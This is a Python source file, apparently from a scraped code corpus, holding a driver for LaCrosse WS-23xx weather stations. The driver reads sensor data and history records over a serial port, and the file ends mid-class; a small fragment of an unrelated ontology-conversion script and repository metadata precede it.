temp_sub_obj_name = sub_obj_name
if temp_sub_obj is not None:
# create object property
getattr(temp_obj,'has_' + temp_sub_obj_name).append(temp_sub_obj)
f.closed
onto.save()
|
lazzyCloud/SLR
|
db2owl/course_json2owl.py
|
Python
|
agpl-3.0
| 4,862 | 0.004319 |
#!usr/bin/env python
#
# Copyright 2013 Matthew Wall
# See the file LICENSE.txt for your full rights.
#
# Thanks to Kenneth Lavrsen for the Open2300 implementation:
# http://www.lavrsen.dk/foswiki/bin/view/Open2300/WebHome
# description of the station communication interface:
# http://www.lavrsen.dk/foswiki/bin/view/Open2300/OpenWSAPI
# memory map:
# http://www.lavrsen.dk/foswiki/bin/view/Open2300/OpenWSMemoryMap
#
# Thanks to Russell Stuart for the ws2300 python implementation:
# http://ace-host.stuart.id.au/russell/files/ws2300/
# and the map of the station memory:
# http://ace-host.stuart.id.au/russell/files/ws2300/memory_map_2300.txt
#
# This immplementation copies directly from Russell Stuart's implementation,
# but only the parts required to read from and write to the weather station.
"""Classes and functions for interfacing with WS-23xx weather stations.
LaCrosse made a number of stations in the 23xx series, including:
WS-2300, WS-2308, WS-2310, WS-2315, WS-2317, WS-2357
The stations were also sold as the TFA Matrix and TechnoLine 2350.
The WWVB receiver is located in the console.
To synchronize the console and sensors, press and hold the PLUS key for 2
seconds. When console is not synchronized no data will be received.
To do a factory reset, press and hold PRESSURE and WIND for 5 seconds.
A single bucket tip is 0.0204 in (0.518 mm).
The station has 175 history records. That is just over 7 days of data with
the default history recording interval of 60 minutes.
The station supports both wireless and wired communication between the
sensors and a station console. Wired connection updates data every 8 seconds.
Wireless connection updates data in 16 to 128 second intervals, depending on
wind speed and rain activity.
The connection type can be one of 0=cable, 3=lost, 15=wireless
sensor update frequency:
32 seconds when wind speed > 22.36 mph (wireless)
128 seconds when wind speed < 22.36 mph (wireless)
10 minutes (wireless after 5 failed attempts)
8 seconds (wired)
console update frequency:
15 seconds (pressure/temperature)
20 seconds (humidity)
It is possible to increase the rate of wireless updates:
http://www.wxforum.net/index.php?topic=2196.0
Sensors are connected by unshielded phone cables. RF interference can cause
random spikes in data, with one symptom being values of 25.5 m/s or 91.8 km/h
for the wind speed. Unfortunately those values are within the sensor limits
of 0-113 mph (50.52 m/s or 181.9 km/h). To reduce the number of spikes in
data, replace with shielded cables:
http://www.lavrsen.dk/sources/weather/windmod.htm
The station records wind speed and direction, but has no notion of gust.
The station calculates windchill and dewpoint.
The station has a serial connection to the computer.
This driver does not keep the serial port open for long periods. Instead, the
driver opens the serial port, reads data, then closes the port.
This driver polls the station. Use the polling_interval parameter to specify
how often to poll for data. If not specified, the polling interval will adapt
based on connection type and status.
USB-Serial Converters
With a USB-serial converter one can connect the station to a computer with
only USB ports, but not every converter will work properly. Perhaps the two
most common converters are based on the Prolific and FTDI chipsets. Many
people report better luck with the FTDI-based converters. Some converters
that use the Prolific chipset (PL2303) will work, but not all of them.
Known to work: ATEN UC-232A
Bounds checking
wind speed: 0-113 mph
wind direction: 0-360
humidity: 0-100
temperature: ok if not -22F and humidity is valid
dewpoint: ok if not -22F and humidity is valid
barometer: 25-35 inHg
rain rate: 0-10 in/hr
Discrepancies Between Implementations
As of December 2013, there are significant differences between the open2300,
wview, and ws2300 implementations. Current version numbers are as follows:
open2300 1.11
ws2300 1.8
wview 5.20.2
History Interval
The factory default is 60 minutes. The value stored in the console is one
less than the actual value (in minutes). So for the factory default of 60,
the console stores 59. The minimum interval is 1.
ws2300.py reports the actual value from the console, e.g., 59 when the
interval is 60. open2300 reports the interval, e.g., 60 when the interval
is 60. wview ignores the interval.
Detecting Bogus Sensor Values
wview queries the station 3 times for each sensor then accepts the value only
if the three values were close to each other.
open2300 sleeps 10 seconds if a wind measurement indicates invalid or overflow.
The ws2300.py implementation includes overflow and validity flags for values
from the wind sensors. It does not retry based on invalid or overflow.
Wind Speed
There is disagreement about how to calculate wind speed and how to determine
whether the wind speed is valid.
This driver introduces a WindConversion object that uses open2300/wview
decoding so that wind speeds match that of open2300/wview. ws2300 1.8
incorrectly uses bcd2num instead of bin2num. This bug is fixed in this driver.
The memory map indicates the following:
addr smpl description
0x527 0 Wind overflow flag: 0 = normal
0x528 0 Wind minimum code: 0=min, 1=--.-, 2=OFL
0x529 0 Windspeed: binary nibble 0 [m/s * 10]
0x52A 0 Windspeed: binary nibble 1 [m/s * 10]
0x52B 0 Windspeed: binary nibble 2 [m/s * 10]
0x52C 8 Wind Direction = nibble * 22.5 degrees
0x52D 8 Wind Direction 1 measurement ago
0x52E 9 Wind Direction 2 measurement ago
0x52F 8 Wind Direction 3 measurement ago
0x530 7 Wind Direction 4 measurement ago
0x531 7 Wind Direction 5 measurement ago
0x532 0
wview 5.20.2 implementation (wview apparently copied from open2300):
read 3 bytes starting at 0x527
0x527 x[0]
0x528 x[1]
0x529 x[2]
if ((x[0] != 0x00) ||
((x[1] == 0xff) && (((x[2] & 0xf) == 0) || ((x[2] & 0xf) == 1)))) {
fail
} else {
dir = (x[2] >> 4) * 22.5
speed = ((((x[2] & 0xf) << 8) + (x[1])) / 10.0 * 2.23693629)
maxdir = dir
maxspeed = speed
}
open2300 1.10 implementation:
read 6 bytes starting at 0x527
0x527 x[0]
0x528 x[1]
0x529 x[2]
0x52a x[3]
0x52b x[4]
0x52c x[5]
if ((x[0] != 0x00) ||
((x[1] == 0xff) && (((x[2] & 0xf) == 0) || ((x[2] & 0xf) == 1)))) {
sleep 10
} else {
dir = x[2] >> 4
speed = ((((x[2] & 0xf) << 8) + (x[1])) / 10.0)
dir0 = (x[2] >> 4) * 22.5
dir1 = (x[3] & 0xf) * 22.5
dir2 = (x[3] >> 4) * 22.5
dir3 = (x[4] & 0xf) * 22.5
dir4 = (x[4] >> 4) * 22.5
dir5 = (x[5] & 0xf) * 22.5
}
ws2300.py 1.8 implementation:
read 1 nibble starting at 0x527
read 1 nibble starting at 0x528
read 4 nibble starting at 0x529
read 3 nibble starting at 0x529
read 1 nibble starting at 0x52c
read 1 nibble starting at 0x52d
read 1 nibble starting at 0x52e
read 1 nibble starting at 0x52f
read 1 nibble starting at 0x530
read 1 nibble starting at 0x531
0x527 overflow
0x528 validity
0x529 speed[0]
0x52a speed[1]
0x52b speed[2]
0x52c dir[0]
speed: ((x[2] * 100 + x[1] * 10 + x[0]) % 1000) / 10
velocity: (x[2] * 100 + x[1] * 10 + x[0]) / 10
dir = data[0] * 22.5
speed = (bcd2num(data) % 10**3 + 0) / 10**1
velocity = (bcd2num(data[:3])/10.0, bin2num(data[3:4]) * 22.5)
bcd2num([a,b,c]) -> c*100+b*10+a
"""
# TODO: use pyserial instead of LinuxSerialPort
# TODO: put the __enter__ and __exit__ scaffolding on serial port, not Station
# FIXME: unless we can get setTime to work, just ignore the console clock
# FIXME: detect bogus wind speed/direction
# i see these when the wind instrument is disconnected:
# ws 26.399999
# wsh 21
# w0 135
from __future__ import with_statement
import logging
import time
import string
import fcntl
import os
import select
import struct
import termios
import tty
from nimbusdrivers import *
DRIVER_NAME = 'WS23xx'
DRIVER_VERSION = '0.24'
def loader(config_dict):
return WS23xxDriver(config_dict=config_dict, **config_dict[DRIVER_NAME])
DEFAULT_PORT = '/dev/ttyUSB0'
def logdbg(msg):
logging.debug(msg)
def loginf(msg):
logging.info(msg)
def logcrt(msg):
logging.critical(msg)
def logerr(msg):
logging.error(msg)
class WS23xxDriver(AbstractDevice):
"""Driver for LaCrosse WS23xx stations."""
def __init__(self, **stn_dict):
"""Initialize the station object.
port: The serial port, e.g., /dev/ttyS0 or /dev/ttyUSB0
[Required. Default is /dev/ttyS0]
polling_interval: How often to poll the station, in seconds.
[Optional. Default is 8 (wired) or 30 (wireless)]
model: Which station model is this?
[Optional. Default is 'LaCrosse WS23xx']
"""
self._last_rain = None
self._last_cn = None
self._poll_wait = 60
self.model = stn_dict.get('model', 'LaCrosse WS23xx')
self.port = stn_dict.get('port', DEFAULT_PORT)
self.max_tries = int(stn_dict.get('max_tries', 5))
self.retry_wait = int(stn_dict.get('retry_wait', 30))
self.polling_interval = stn_dict.get('polling_interval', None)
if self.polling_interval is not None:
self.polling_interval = int(self.polling_interval)
self.enable_startup_records = stn_dict.get('enable_startup_records',
True)
self.enable_archive_records = stn_dict.get('enable_archive_records',
True)
self.mode = stn_dict.get('mode', 'single_open')
loginf('driver version is %s' % DRIVER_VERSION)
loginf('serial port is %s' % self.port)
loginf('polling interval is %s' % self.polling_interval)
if self.mode == 'single_open':
self.station = WS23xx(self.port)
else:
self.station = None
def closePort(self):
if self.station is not None:
self.station.close()
self.station = None
@property
def hardware_name(self):
return self.model
# weewx wants the archive interval in seconds, but the console uses minutes
@property
def archive_interval(self):
if not self.enable_startup_records and not self.enable_archive_records:
raise NotImplementedError
return self.getArchiveInterval() * 60
def genLoopPackets(self):
ntries = 0
while ntries < self.max_tries:
ntries += 1
try:
if self.station:
data = self.station.get_raw_data(SENSOR_IDS)
else:
with WS23xx(self.port) as s:
data = s.get_raw_data(SENSOR_IDS)
packet = data_to_packet(data, int(time.time() + 0.5),
last_rain=self._last_rain)
self._last_rain = packet['rainTotal']
ntries = 0
yield packet
if self.polling_interval is not None:
self._poll_wait = self.polling_interval
if data['cn'] != self._last_cn:
conn_info = get_conn_info(data['cn'])
loginf("connection changed from %s to %s" %
(get_conn_info(self._last_cn)[0], conn_info[0]))
self._last_cn = data['cn']
if self.polling_interval is None:
loginf("using %s second polling interval"
" for %s connection" %
(conn_info[1], conn_info[0]))
self._poll_wait = conn_info[1]
time.sleep(self._poll_wait)
except Ws2300.Ws2300Exception, e:
logerr("Failed attempt %d of %d to get LOOP data: %s" %
(ntries, self.max_tries, e))
logdbg("Waiting %d seconds before retry" % self.retry_wait)
time.sleep(self.retry_wait)
else:
msg = "Max retries (%d) exceeded for LOOP data" % self.max_tries
logerr(msg)
raise RetriesExceeded(msg)
def genStartupRecords(self):
since_ts = 0
if not self.enable_startup_records:
raise NotImplementedError
if self.station:
return self.genRecords(self.station, since_ts)
else:
with WS23xx(self.port) as s:
return self.genRecords(s, since_ts)
def genRecords(self, s, since_ts, count=0):
last_rain = None
for ts, data in s.gen_records(since_ts=since_ts, count=count):
record = data_to_packet(data, ts, last_rain=last_rain)
record['interval'] = data['interval']
last_rain = record['rainTotal']
yield record
# def getTime(self) :
# with WS23xx(self.port) as s:
# return s.get_time()
# def setTime(self):
# with WS23xx(self.port) as s:
# s.set_time()
def getArchiveInterval(self):
if self.station:
return self.station.get_archive_interval()
else:
with WS23xx(self.port) as s:
return s.get_archive_interval()
def setArchiveInterval(self, interval):
if self.station:
self.station.set_archive_interval(interval)
else:
with WS23xx(self.port) as s:
s.set_archive_interval(interval)
def getConfig(self):
fdata = dict()
if self.station:
data = self.station.get_raw_data(Measure.IDS.keys())
else:
with WS23xx(self.port) as s:
data = s.get_raw_data(Measure.IDS.keys())
for key in data:
fdata[Measure.IDS[key].name] = data[key]
return fdata
def getRecordCount(self):
if self.station:
return self.station.get_record_count()
else:
with WS23xx(self.port) as s:
return s.get_record_count()
def clearHistory(self):
if self.station:
self.station.clear_memory()
else:
with WS23xx(self.port) as s:
s.clear_memory()
# ids for current weather conditions and connection type
SENSOR_IDS = ['it','ih','ot','oh','pa','wind','rh','rt','dp','wc','cn']
# polling interval, in seconds, for various connection types
POLLING_INTERVAL = {0: ("cable", 8), 3: ("lost", 60), 15: ("wireless", 30)}
def get_conn_info(conn_type):
return POLLING_INTERVAL.get(conn_type, ("unknown", 60))
def data_to_packet(data, ts, last_rain=None):
"""Convert raw data to format and units required by weewx.
station weewx (metric)
temperature degree C degree C
humidity percent percent
uv index unitless unitless
pressure mbar mbar
wind speed m/s km/h
wind dir degree degree
wind gust None
wind gust dir None
rain mm cm
rain rate cm/h
"""
packet = dict()
packet['units'] = METRIC
packet['dateTime'] = ts
packet['inTemp'] = data['it']
packet['inHumidity'] = data['ih']
packet['outTemp'] = data['ot']
packet['outHumidity'] = data['oh']
packet['pressure'] = data['pa']
ws, wd, wso, wsv = data['wind']
if wso == 0 and wsv == 0:
packet['windSpeed'] = ws
if packet['windSpeed'] is not None:
packet['windSpeed'] *= 3.6 # weewx wants km/h
packet['windDir'] = wd if packet['windSpeed'] else None
else:
loginf('invalid wind reading: speed=%s dir=%s overflow=%s invalid=%s' %
(ws, wd, wso, wsv))
packet['windSpeed'] = None
packet['windDir'] = None
packet['windGust'] = None
packet['windGustDir'] = None
packet['rainTotal'] = data['rt']
if packet['rainTotal'] is not None:
packet['rainTotal'] /= 10 # weewx wants cm
packet['rain'] = packet['rainTotal'] - last_rain
# station provides some derived variables
packet['rainRate'] = data['rh']
if packet['rainRate'] is not None:
packet['rainRate'] /= 10 # weewx wants cm/hr
packet['dewpoint'] = data['dp']
packet['windchill'] = data['wc']
return packet
class WS23xx(object):
"""Wrap the Ws2300 object so we can easily open serial port, read/write,
close serial port without all of the try/except/finally scaffolding."""
def __init__(self, port):
logdbg('create LinuxSerialPort')
self.serial_port = LinuxSerialPort(port)
logdbg('create Ws2300')
self.ws = Ws2300(self.serial_port)
def __enter__(self):
logdbg('station enter')
return self
def __exit__(self, type_, value, traceback):
logdbg('station exit')
self.ws = None
self.close()
def close(self):
logdbg('close LinuxSerialPort')
self.serial_port.close()
self.serial_port = None
def set_time(self, ts):
"""Set station time to indicated unix epoch."""
for m in [Measure.IDS['sd'], Measure.IDS['st']]:
data = m.conv.value2binary(ts)
cmd = m.conv.write(data, None)
self.ws.write_safe(m.address, *cmd[1:])
def get_time(self):
"""Return station time as unix epoch."""
data = self.get_raw_data(['sw'])
ts = int(data['sw'])
return ts
def set_archive_interval(self, interval):
"""Set the archive interval in minutes."""
if int(interval) < 1:
raise ValueError('archive interval must be greater than zero')
logdbg('setting hardware archive interval to %s minutes' % interval)
interval -= 1
for m,v in [(Measure.IDS['hi'],interval), # archive interval in minutes
(Measure.IDS['hc'],1), # time till next sample in minutes
(Measure.IDS['hn'],0)]: # number of valid records
data = m.conv.value2binary(v)
cmd = m.conv.write(data, None)
self.ws.write_safe(m.address, *cmd[1:])
def get_archive_interval(self):
"""Return archive interval in minutes."""
data = self.get_raw_data(['hi'])
x = 1 + int(data['hi'])
logdbg('station archive interval is %s minutes' % x)
return x
def clear_memory(self):
"""Clear station memory."""
logdbg('clearing console memory')
for m,v in [(Measure.IDS['hn'],0)]: # number of valid records
data = m.conv.value2binary(v)
cmd = m.conv.write(data, None)
self.ws.write_safe(m.address, *cmd[1:])
def get_record_count(self):
data = self.get_raw_data(['hn'])
x = int(data['hn'])
logdbg('record count is %s' % x)
return x
def gen_records(self, since_ts=None, count=None, use_computer_clock=True):
"""Get latest count records from the station from oldest to newest. If
count is 0 or None, return all records.
The station has a history interval, and it records when the last
history sample was saved. So as long as the interval does not change
between the first and last records, we are safe to infer timestamps
for each record. This assumes that if the station loses power then
the memory will be cleared.
There is no timestamp associated with each record - we have to guess.
The station tells us the time until the next record and the epoch of
the latest record, based on the station's clock. So we can use that
or use the computer clock to guess the timestamp for each record.
To ensure accurate data, the first record must be read within one
minute of the initial read and the remaining records must be read
within numrec * interval minutes.
"""
logdbg("gen_records: since_ts=%s count=%s clock=%s" %
(since_ts, count, use_computer_clock))
measures = [Measure.IDS['hi'], Measure.IDS['hw'],
Measure.IDS['hc'], Measure.IDS['hn']]
raw_data = read_measurements(self.ws, measures)
interval = 1 + int(measures[0].conv.binary2value(raw_data[0])) # minute
latest_ts = int(measures[1].conv.binary2value(raw_data[1])) # epoch
time_to_next = int(measures[2].conv.binary2value(raw_data[2])) # minute
numrec = int(measures[3].conv.binary2value(raw_data[3]))
now = int(time.time())
cstr = 'station'
if use_computer_clock:
latest_ts = now - (interval - time_to_next) * 60
cstr = 'computer'
if not count:
count = HistoryMeasure.MAX_HISTORY_RECORDS
if since_ts is not None:
count = int((now - since_ts) / (interval * 60))
if count == 0:
return
if count > numrec:
count = numrec
if count > HistoryMeasure.MAX_HISTORY_RECORDS:
count = HistoryMeasure.MAX_HISTORY_RECORDS
# station is about to overwrite first record, so skip it
if time_to_next <= 1 and count == HistoryMeasure.MAX_HISTORY_RECORDS:
count -= 1
logdbg("downloading %d records from station" % count)
HistoryMeasure.set_constants(self.ws)
measures = [HistoryMeasure(n) for n in range(count-1, -1, -1)]
raw_data = read_measurements(self.ws, measures)
last_ts = latest_ts - (count-1) * interval * 60
for measure, nybbles in zip(measures, raw_data):
value = measure.conv.binary2value(nybbles)
data_dict = {
'interval': interval,
'it': value.temp_indoor,
'ih': value.humidity_indoor,
'ot': value.temp_outdoor,
'oh': value.humidity_outdoor,
'pa': value.pressure_absolute,
'rt': value.rain,
'wind': (value.wind_speed/10, value.wind_direction, 0, 0),
'rh': None, # no rain rate in history
'dp': None, # no dewpoint in history
'wc': None, # no windchill in history
}
yield last_ts, data_dict
last_ts += interval * 60
def get_raw_data(self, labels):
"""Get raw data from the station, return as dictionary."""
measures = [Measure.IDS[m] for m in labels]
raw_data = read_measurements(self.ws, measures)
data_dict = dict(zip(labels, [m.conv.binary2value(d) for m, d in zip(measures, raw_data)]))
return data_dict
# =============================================================================
# The following code was adapted from ws2300.py by Russell Stuart
# =============================================================================
VERSION = "1.8 2013-08-26"
#
# Debug options.
#
DEBUG_SERIAL = False
#
# A fatal error.
#
class FatalError(StandardError):
source = None
message = None
cause = None
def __init__(self, source, message, cause=None):
self.source = source
self.message = message
self.cause = cause
StandardError.__init__(self, message)
#
# The serial port interface. We can talk to the Ws2300 over anything
# that implements this interface.
#
class SerialPort(object):
#
# Discard all characters waiting to be read.
#
def clear(self): raise NotImplementedError()
#
# Close the serial port.
#
def close(self): raise NotImplementedError()
#
# Wait for all characters to be sent.
#
def flush(self): raise NotImplementedError()
#
# Read a character, waiting for a most timeout seconds. Return the
# character read, or None if the timeout occurred.
#
def read_byte(self, timeout): raise NotImplementedError()
#
# Release the serial port. Closes it until it is used again, when
# it is automatically re-opened. It need not be implemented.
#
def release(self): pass
#
# Write characters to the serial port.
#
def write(self, data): raise NotImplementedError()
#
# A Linux Serial port. Implements the Serial interface on Linux.
#
class LinuxSerialPort(SerialPort):
SERIAL_CSIZE = {
"7": tty.CS7,
"8": tty.CS8, }
SERIAL_PARITIES= {
"e": tty.PARENB,
"n": 0,
"o": tty.PARENB|tty.PARODD, }
SERIAL_SPEEDS = {
"300": tty.B300,
"600": tty.B600,
"1200": tty.B1200,
"2400": tty.B2400,
"4800": tty.B4800,
"9600": tty.B9600,
"19200": tty.B19200,
"38400": tty.B38400,
"57600": tty.B57600,
"115200": tty.B115200, }
SERIAL_SETTINGS = "2400,n,8,1"
device = None # string, the device name.
orig_settings = None # class, the original ports settings.
select_list = None # list, The serial ports
serial_port = None # int, OS handle to device.
settings = None # string, the settings on the command line.
#
# Initialise ourselves.
#
def __init__(self,device,settings=SERIAL_SETTINGS):
self.device = device
self.settings = settings.split(",")
self.settings.extend([None,None,None])
self.settings[0] = self.__class__.SERIAL_SPEEDS.get(self.settings[0], None)
self.settings[1] = self.__class__.SERIAL_PARITIES.get(self.settings[1].lower(), None)
self.settings[2] = self.__class__.SERIAL_CSIZE.get(self.settings[2], None)
if len(self.settings) != 7 or None in self.settings[:3]:
raise FatalError(self.device, 'Bad serial settings "%s".' % settings)
self.settings = self.settings[:4]
#
# Open the port.
#
try:
self.serial_port = os.open(self.device, os.O_RDWR)
except EnvironmentError, e:
raise FatalError(self.device, "can't open tty device - %s." % str(e))
try:
fcntl.flock(self.serial_port, fcntl.LOCK_EX)
self.orig_settings = tty.tcgetattr(self.serial_port)
setup = self.orig_settings[:]
setup[0] = tty.INPCK
setup[1] = 0
setup[2] = tty.CREAD|tty.HUPCL|tty.CLOCAL|reduce(lambda x,y: x|y, self.settings[:3])
setup[3] = 0 # tty.ICANON
setup[4] = self.settings[0]
setup[5] = self.settings[0]
setup[6] = ['\000']*len(setup[6])
setup[6][tty.VMIN] = 1
setup[6][tty.VTIME] = 0
tty.tcflush(self.serial_port, tty.TCIOFLUSH)
#
# Restart IO if stopped using software flow control (^S/^Q). This
# doesn't work on FreeBSD.
#
try:
tty.tcflow(self.serial_port, tty.TCOON|tty.TCION)
except termios.error:
pass
tty.tcsetattr(self.serial_port, tty.TCSAFLUSH, setup)
#
# Set DTR low and RTS high and leave other control lines untouched.
#
arg = struct.pack('I', 0)
arg = fcntl.ioctl(self.serial_port, tty.TIOCMGET, arg)
portstatus = struct.unpack('I', arg)[0]
portstatus = portstatus & ~tty.TIOCM_DTR | tty.TIOCM_RTS
arg = struct.pack('I', portstatus)
fcntl.ioctl(self.serial_port, tty.TIOCMSET, arg)
self.select_list = [self.serial_port]
except Exception:
os.close(self.serial_port)
raise
def close(self):
if self.orig_settings:
tty.tcsetattr(self.serial_port, tty.TCSANOW, self.orig_settings)
os.close(self.serial_port)
def read_byte(self, timeout):
ready = select.select(self.select_list, [], [], timeout)
if not ready[0]:
return None
return os.read(self.serial_port, 1)
#
# Write a string to the port.
#
def write(self, data):
os.write(self.serial_port, data)
#
# Flush the input buffer.
#
def clear(self):
tty.tcflush(self.serial_port, tty.TCIFLUSH)
#
# Flush the output buffer.
#
def flush(self):
tty.tcdrain(self.serial_port)
#
# This class reads and writes bytes to a Ws2300. It is passed something
# that implements the Serial interface. The major routines are:
#
# Ws2300() - Create one of these objects that talks over the serial port.
# read_batch() - Reads data from the device using an scatter/gather interface.
# write_safe() - Writes data to the device.
#
class Ws2300(object):
#
# An exception for us.
#
class Ws2300Exception(WeeWxIOError):
def __init__(self, *args):
WeeWxIOError.__init__(self, *args)
#
# Constants we use.
#
MAXBLOCK = 30
MAXRETRIES = 50
MAXWINDRETRIES= 20
WRITENIB = 0x42
SETBIT = 0x12
UNSETBIT = 0x32
WRITEACK = 0x10
SETACK = 0x04
UNSETACK = 0x0C
RESET_MIN = 0x01
RESET_MAX = 0x02
MAX_RESETS = 100
#
# Instance data.
#
log_buffer = None # list, action log
log_mode = None # string, Log mode
long_nest = None # int, Nesting of log actions
serial_port = None # string, SerialPort port to use
#
# Initialise ourselves.
#
def __init__(self,serial_port):
self.log_buffer = []
self.log_nest = 0
self.serial_port = serial_port
#
# Write data to the device.
#
def write_byte(self,data):
if self.log_mode != 'w':
if self.log_mode != 'e':
self.log(' ')
self.log_mode = 'w'
self.log("%02x" % ord(data))
self.serial_port.write(data)
#
# Read a byte from the device.
#
def read_byte(self, timeout=1.0):
if self.log_mode != 'r':
self.log_mode = 'r'
self.log(':')
result = self.serial_port.read_byte(timeout)
if result == None:
self.log("--")
else:
self.log("%02x" % ord(result))
return result
#
# Remove all pending incoming characters.
#
def clear_device(self):
if self.log_mode != 'e':
self.log(' ')
self.log_mode = 'c'
self.log("C")
self.serial_port.clear()
#
# Write a reset string and wait for a reply.
#
def reset_06(self):
self.log_enter("re")
try:
for _ in range(self.__class__.MAX_RESETS):
self.clear_device()
self.write_byte('\x06')
#
# Occasionally 0, then 2 is returned. If 0 comes back,
# continue reading as this is more efficient than sending
# an out-of sync reset and letting the data reads restore
# synchronization. Occasionally, multiple 2's are returned.
# Read with a fast timeout until all data is exhausted, if
# we got a 2 back at all, we consider it a success.
#
success = False
answer = self.read_byte()
while answer != None:
if answer == '\x02':
success = True
answer = self.read_byte(0.05)
if success:
return
msg = "Reset failed, %d retries, no response" % self.__class__.MAX_RESETS
raise self.Ws2300Exception(msg)
finally:
self.log_exit()
#
# Encode the address.
#
def write_address(self,address):
for digit in range(4):
byte = chr((address >> (4 * (3-digit)) & 0xF) * 4 + 0x82)
self.write_byte(byte)
ack = chr(digit * 16 + (ord(byte) - 0x82) // 4)
answer = self.read_byte()
if ack != answer:
self.log("??")
return False
return True
#
# Write data, checking the reply.
#
def write_data(self,nybble_address,nybbles,encode_constant=None):
self.log_enter("wd")
try:
if not self.write_address(nybble_address):
return None
if encode_constant == None:
encode_constant = self.WRITENIB
encoded_data = ''.join([
chr(nybbles[i]*4 + encode_constant)
for i in range(len(nybbles))])
ack_constant = {
self.SETBIT: self.SETACK,
self.UNSETBIT: self.UNSETACK,
self.WRITENIB: self.WRITEACK
}[encode_constant]
self.log(",")
for i in range(len(encoded_data)):
self.write_byte(encoded_data[i])
answer = self.read_byte()
if chr(nybbles[i] + ack_constant) != answer:
self.log("??")
return None
return True
finally:
self.log_exit()
#
# Reset the device and write a command, verifing it was written correctly.
#
def write_safe(self,nybble_address,nybbles,encode_constant=None):
self.log_enter("ws")
try:
for _ in range(self.MAXRETRIES):
self.reset_06()
command_data = self.write_data(nybble_address,nybbles,encode_constant)
if command_data != None:
return command_data
raise self.Ws2300Exception("write_safe failed, retries exceeded")
finally:
self.log_exit()
#
# A total kuldge this, but its the easiest way to force the 'computer
# time' to look like a normal ws2300 variable, which it most definitely
# isn't, of course.
#
def read_computer_time(self,nybble_address,nybble_count):
now = time.time()
tm = time.localtime(now)
tu = time.gmtime(now)
year2 = tm[0] % 100
datetime_data = (
tu[5]%10, tu[5]//10, tu[4]%10, tu[4]//10, tu[3]%10, tu[3]//10,
tm[5]%10, tm[5]//10, tm[4]%10, tm[4]//10, tm[3]%10, tm[3]//10,
tm[2]%10, tm[2]//10, tm[1]%10, tm[1]//10, year2%10, year2//10)
address = nybble_address+18
return datetime_data[address:address+nybble_count]
#
# Read 'length' nybbles at address. Returns: (nybble_at_address, ...).
# Can't read more than MAXBLOCK nybbles at a time.
#
def read_data(self,nybble_address,nybble_count):
if nybble_address < 0:
return self.read_computer_time(nybble_address,nybble_count)
self.log_enter("rd")
try:
if nybble_count < 1 or nybble_count > self.MAXBLOCK:
StandardError("Too many nybbles requested")
bytes_ = (nybble_count + 1) // 2
if not self.write_address(nybble_address):
return None
#
# Write the number bytes we want to read.
#
encoded_data = chr(0xC2 + bytes_*4)
self.write_byte(encoded_data)
answer = self.read_byte()
check = chr(0x30 + bytes_)
if answer != check:
self.log("??")
return None
#
# Read the response.
#
self.log(", :")
response = ""
for _ in range(bytes_):
answer = self.read_byte()
if answer == None:
return None
response += answer
#
# Read and verify checksum
#
answer = self.read_byte()
checksum = sum([ord(b) for b in response]) % 256
if chr(checksum) != answer:
self.log("??")
return None
flatten = lambda a,b: a + (ord(b) % 16, ord(b) / 16)
return reduce(flatten, response, ())[:nybble_count]
finally:
self.log_exit()
#
# Read a batch of blocks. Batches is a list of data to be read:
# [(address_of_first_nybble, length_in_nybbles), ...]
# returns:
# [(nybble_at_address, ...), ...]
#
def read_batch(self,batches):
self.log_enter("rb start")
self.log_exit()
try:
if [b for b in batches if b[0] >= 0]:
self.reset_06()
result = []
for batch in batches:
address = batch[0]
data = ()
for start_pos in range(0,batch[1],self.MAXBLOCK):
for _ in range(self.MAXRETRIES):
bytes_ = min(self.MAXBLOCK, batch[1]-start_pos)
response = self.read_data(address + start_pos, bytes_)
if response != None:
break
self.reset_06()
if response == None:
raise self.Ws2300Exception("read failed, retries exceeded")
data += response
result.append(data)
return result
finally:
self.log_enter("rb end")
self.log_exit()
#
# Reset the device, read a block of nybbles at the passed address.
#
def read_safe(self,nybble_address,nybble_count):
self.log_enter("rs")
try:
return self.read_batch([(nybble_address,nybble_count)])[0]
finally:
self.log_exit()
#
# Debug logging of serial IO.
#
def log(self, s):
if not DEBUG_SERIAL:
return
self.log_buffer[-1] = self.log_buffer[-1] + s
def log_enter(self, action):
if not DEBUG_SERIAL:
return
self.log_nest += 1
if self.log_nest == 1:
if len(self.log_buffer) > 1000:
del self.log_buffer[0]
self.log_buffer.append("%5.2f %s " % (time.time() % 100, action))
self.log_mode = 'e'
def log_exit(self):
if not DEBUG_SERIAL:
return
self.log_nest -= 1
#
# Print a data block.
#
def bcd2num(nybbles):
digits = list(nybbles)[:]
digits.reverse()
return reduce(lambda a,b: a*10 + b, digits, 0)
def num2bcd(number, nybble_count):
result = []
for _ in range(nybble_count):
result.append(int(number % 10))
number //= 10
return tuple(result)
def bin2num(nybbles):
digits = list(nybbles)
digits.reverse()
return reduce(lambda a,b: a*16 + b, digits, 0)
def num2bin(number, nybble_count):
result = []
number = int(number)
for _ in range(nybble_count):
result.append(number % 16)
number //= 16
return tuple(result)
#
# A "Conversion" encapsulates a unit of measurement on the Ws2300. Eg
# temperature, or wind speed.
#
class Conversion(object):
description = None # Description of the units.
nybble_count = None # Number of nybbles used on the WS2300
units = None # Units name (eg hPa).
#
# Initialise ourselves.
# units - text description of the units.
# nybble_count- Size of stored value on ws2300 in nybbles
# description - Description of the units
#
def __init__(self, units, nybble_count, description):
self.description = description
self.nybble_count = nybble_count
self.units = units
#
# Convert the nybbles read from the ws2300 to our internal value.
#
def binary2value(self, data): raise NotImplementedError()
#
# Convert our internal value to nybbles that can be written to the ws2300.
#
def value2binary(self, value): raise NotImplementedError()
#
# Print value.
#
def str(self, value): raise NotImplementedError()
#
# Convert the string produced by "str()" back to the value.
#
def parse(self, s): raise NotImplementedError()
#
# Transform data into something that can be written. Returns:
# (new_bytes, ws2300.write_safe_args, ...)
# This only becomes tricky when less than a nybble is written.
#
def write(self, data, nybble):
return (data, data)
#
# Test if the nybbles read from the Ws2300 is sensible. Sometimes a
# communications error will make it past the weak checksums the Ws2300
# uses. This optional function implements another layer of checking -
# does the value returned make sense. Returns True if the value looks
# like garbage.
#
def garbage(self, data):
return False
#
# For values stores as binary numbers.
#
class BinConversion(Conversion):
mult = None
scale = None
units = None
def __init__(self, units, nybble_count, scale, description, mult=1, check=None):
Conversion.__init__(self, units, nybble_count, description)
self.mult = mult
self.scale = scale
self.units = units
def binary2value(self, data):
return (bin2num(data) * self.mult) / 10.0**self.scale
def value2binary(self, value):
return num2bin(int(value * 10**self.scale) // self.mult, self.nybble_count)
def str(self, value):
return "%.*f" % (self.scale, value)
def parse(self, s):
return float(s)
#
# For values stored as BCD numbers.
#
class BcdConversion(Conversion):
offset = None
scale = None
units = None
